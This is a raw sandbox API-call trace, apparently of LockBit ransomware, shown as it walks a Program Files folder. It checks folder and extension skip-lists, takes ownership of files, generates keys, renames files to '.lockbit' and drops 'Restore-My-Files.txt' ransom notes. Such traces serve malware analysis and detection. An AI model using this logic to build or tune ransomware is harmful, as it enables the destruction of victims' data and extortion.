[0077.004] lstrcmpiW (lpString1=".", lpString2="DvdStyles") returned -1 [0077.004] lstrcmpiW (lpString1="..", lpString2="DvdStyles") returned -1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="$windows.~bt") returned 1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="intel") returned -1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="msocache") returned -1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="$recycle.bin") returned 1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="$windows.~ws") returned 1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="tor browser") returned -1 [0077.004] lstrcmpiW (lpString1="DvdStyles", lpString2="boot") returned 1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="system volume information") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="perflogs") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="google") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="application data") returned 1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="windows") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="windows.old") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="appdata") returned 1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Windows nt") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Msbuild") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Microsoft") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="All users") returned 1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="mozilla") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Microsoft.NET") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="microsoft shared") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Internet Explorer") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="common files") returned 1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="opera") returned -1 [0077.005] lstrcmpiW (lpString1="DvdStyles", lpString2="Windows Journal") returned -1 [0077.005] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 44 [0077.005] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*") returned 46 [0077.005] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0077.012] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.013] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.016] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.016] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.016] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec183f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec183f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x278b, dwReserved0=0x520150, dwReserved1=0x0, cFileName="16to9Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0077.016] lstrcmpiW (lpString1=".", lpString2="16to9Squareframe_Buttongraphic.png") returned -1 [0077.016] lstrcmpiW (lpString1="..", lpString2="16to9Squareframe_Buttongraphic.png") returned -1 [0077.016] PathFindExtensionW (pszPath="16to9Squareframe_Buttongraphic.png") returned=".png" [0077.016] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.016] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.016] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.017] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.017] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.018] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.018] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.018] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.018] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="ntldr", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="bootsect.bak", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="autorun.inf", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="thumbs.db", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] lstrcmpiW (lpString1="iconcache.db", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0077.018] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.018] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned=".png" [0077.018] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.018] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.019] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.019] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.020] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.020] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.lockbit") returned 87 [0077.020] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.031] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.031] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.031] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.031] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.032] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.032] RtlFreeAnsiString (AnsiString="\\") [0077.032] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3a0) returned 0x0 [0077.032] malloc (_Size=0x200) returned 0x77d800 [0077.032] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.032] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.032] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.032] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.033] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.033] CloseHandle (hObject=0x3a0) returned 1 [0077.033] free (_Block=0x77d800) [0077.033] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0077.033] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.033] malloc (_Size=0x40068) returned 0x3d70048 [0077.033] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=10123) returned 1 [0077.033] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0077.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0077.035] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0077.037] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.037] malloc (_Size=0xc4) returned 0x1ff1e60 [0077.037] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0077.037] free (_Block=0x1ff1e60) [0077.037] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0077.037] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0077.038] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0077.041] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.041] malloc (_Size=0x40068) returned 0x1fb18c0 [0077.041] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.043] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0x520150, dwReserved1=0x0, cFileName="16to9Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0077.043] lstrcmpiW (lpString1=".", lpString2="16to9Squareframe_SelectionSubpicture.png") returned -1 [0077.043] lstrcmpiW (lpString1="..", lpString2="16to9Squareframe_SelectionSubpicture.png") returned -1 [0077.043] PathFindExtensionW (pszPath="16to9Squareframe_SelectionSubpicture.png") returned=".png" [0077.043] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0077.043] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0077.043] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0077.044] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0077.044] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0077.045] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0077.045] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0077.045] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0077.045] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="ntldr", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="bootsect.bak", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="autorun.inf", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="thumbs.db", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] lstrcmpiW (lpString1="iconcache.db", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0077.045] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0077.045] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned=".png" [0077.045] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0077.045] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0077.046] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0077.046] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0077.046] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0077.046] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0077.046] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0077.046] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0077.047] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0077.047] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0077.047] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0077.047] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.lockbit") returned 93 [0077.047] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.047] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.048] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.048] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.048] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.048] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.048] RtlFreeAnsiString (AnsiString="\\") [0077.048] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b4) returned 0x0 [0077.048] malloc (_Size=0x200) returned 0x77d800 [0077.048] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0077.048] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.048] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.049] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.049] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0077.049] CloseHandle (hObject=0x3b4) returned 1 [0077.049] free (_Block=0x77d800) [0077.049] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.049] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.050] malloc (_Size=0x40068) returned 0x1ff1e60 [0077.051] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3286) returned 1 [0077.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.051] GetProcAddress 